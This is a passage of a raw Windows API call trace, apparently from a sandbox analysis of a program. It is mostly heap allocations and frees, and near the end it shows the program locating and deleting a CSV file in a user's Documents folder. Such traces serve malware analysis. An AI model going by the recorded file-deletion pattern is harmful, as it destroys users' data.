wRemoveMsg=0x1 | out: lpMsg=0x144e724) returned 0 [0083.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0083.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3f0 | out: hHeap=0x1780000) returned 1 [0083.033] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0083.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c60 [0083.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c10 [0083.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c90 [0083.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0083.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0083.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0083.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0083.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0083.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0083.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb3c0 [0083.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb3d8 [0083.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb420 [0083.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb450 [0083.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb438 [0083.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb3f0 [0083.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0083.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb408 [0083.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bf0 [0083.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0083.034] CloseHandle (hObject=0x258) returned 1 [0083.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0083.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0083.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ed3b0 | out: hHeap=0x1780000) returned 1 [0083.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0083.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0083.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0083.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0083.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb408 | out: hHeap=0x1780000) returned 1 [0083.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0083.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3c0 | out: hHeap=0x1780000) returned 1 [0083.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3d8 | out: hHeap=0x1780000) returned 1 [0083.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb450 | out: hHeap=0x1780000) returned 1 [0083.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb420 | out: hHeap=0x1780000) returned 1 [0083.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb438 | out: hHeap=0x1780000) returned 1 [0083.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3f0 | out: hHeap=0x1780000) returned 1 [0083.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0083.035] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0083.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c60 [0083.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c10 [0083.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bc0 [0083.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0083.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0083.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0083.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0083.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0083.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0083.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb420 [0083.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb438 [0083.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb3a8 [0083.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3f0 [0083.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb450 [0083.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb468 [0083.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0083.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3c0 [0083.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c40 [0083.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0083.036] CloseHandle (hObject=0x298) returned 1 [0083.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0083.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0083.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0083.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0083.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb480 | out: hHeap=0x1780000) returned 1 [0083.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0083.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0083.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3c0 | out: hHeap=0x1780000) returned 1 [0083.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0083.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb420 | out: hHeap=0x1780000) returned 1 [0083.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb438 | out: hHeap=0x1780000) returned 1 [0083.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3f0 | out: hHeap=0x1780000) returned 1 [0083.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3a8 | out: hHeap=0x1780000) returned 1 [0083.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb450 | out: hHeap=0x1780000) returned 1 [0083.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb468 | out: hHeap=0x1780000) returned 1 [0083.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0083.039] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0083.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b30 [0083.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0083.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb4b0 [0083.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d00 [0083.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0083.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb438 [0083.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bb0 [0083.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0083.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb480 [0083.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bc0 [0083.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0083.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb4b0 | out: hHeap=0x1780000) returned 1 [0083.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb438 | out: hHeap=0x1780000) returned 1 [0083.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb480 | out: hHeap=0x1780000) returned 1 [0083.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0083.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0083.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0083.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x48f0048 | out: hHeap=0x1780000) returned 1 [0083.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0083.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0083.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0083.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0083.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0083.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0083.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0083.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0083.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0083.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0083.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0083.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0083.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0083.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0083.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0083.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0083.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0083.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0083.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0083.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ea8 | out: hHeap=0x1780000) returned 1 [0083.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0083.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0083.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0083.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0083.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0083.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0083.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0083.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0083.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0083.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d20 | out: hHeap=0x1780000) returned 1 [0083.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0083.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0083.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0083.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0083.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0083.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0083.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0083.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0083.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0083.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0083.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0083.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0083.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0083.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0083.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2e8 | out: hHeap=0x1780000) returned 1 [0083.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0083.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0083.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0083.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0083.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0083.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0083.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0083.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0083.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0083.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0083.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0083.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0083.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0083.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0083.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b218f0 | out: hHeap=0x1780000) returned 1 [0083.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0083.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0083.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0083.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0083.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0083.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0083.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0083.043] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0083.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0083.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0083.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0083.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0083.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0083.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0083.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0083.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0083.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0083.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0083.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0083.043] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\kDeOPhXR4D.csv", nBufferLength=0x7fff, lpBuffer=0x143e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\kDeOPhXR4D.csv", lpFilePart=0x0) returned 0x54 [0083.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0083.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42da070 [0083.043] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\kDeOPhXR4D.csv" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\-hpkoimryovvcxapkjwd\\kdeophxr4d.csv")) returned 0x20 [0083.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0083.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0083.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0083.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0083.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0083.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0083.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0083.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0083.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0083.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0083.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0083.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42d9888 [0083.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0083.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0083.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0083.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4051040 [0083.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42d9888 | out: hHeap=0x1780000) returned 1 [0083.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0083.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0083.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0083.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0083.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0083.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0083.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0083.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0083.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0083.045] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\kDeOPhXR4D.csv", lpFindFileData=0x144e878 | out: lpFindFileData=0x144e878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49be8ab0, ftCreationTime.dwHighDateTime=0x1d5ead7, ftLastAccessTime.dwLowDateTime=0xc4079560, ftLastAccessTime.dwHighDateTime=0x1d5e757, ftLastWriteTime.dwLowDateTime=0xc4079560, ftLastWriteTime.dwHighDateTime=0x1d5e757, nFileSizeHigh=0x0, nFileSizeLow=0x10d72, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="kDeOPhXR4D.csv", cAlternateFileName="KDEOPH~1.CSV")) returned 0x41ac6c0 [0083.045] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\kDeOPhXR4D.csv" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\-hpkoimryovvcxapkjwd\\kdeophxr4d.csv")) returned 1 [0083.086] FindNextFileW (in: hFindFile=0x41ac6c0, lpFindFileData=0x144e878 | out: lpFindFileData=0x144e878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49be8ab0, ftCreationTime.dwHighDateTime=0x1d5ead7, ftLastAccessTime.dwLowDateTime=0xc4079560, ftLastAccessTime.dwHighDateTime=0x1d5e757, ftLastWriteTime.dwLowDateTime=0xc4079560, ftLastWriteTime.dwHighDateTime=0x1d5e757, nFileSizeHigh=0x0, nFileSizeLow=0x10d72, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="kDeOPhXR4D.csv", cAlternateFileName="KDEOPH~1.CSV")) returned 0 [0083.086] FindClose (in: hFindFile=0x41ac6c0 | out: hFindFile=0x41ac6c0) returned 1 [0083.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4051040 | out: hHeap=0x1780000) returned 1 [0083.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0083.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0083.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0083.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42da070 | out: hHeap=0x1780000) returned 1 [0083.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0083.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0083.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0083.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0083.087] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, 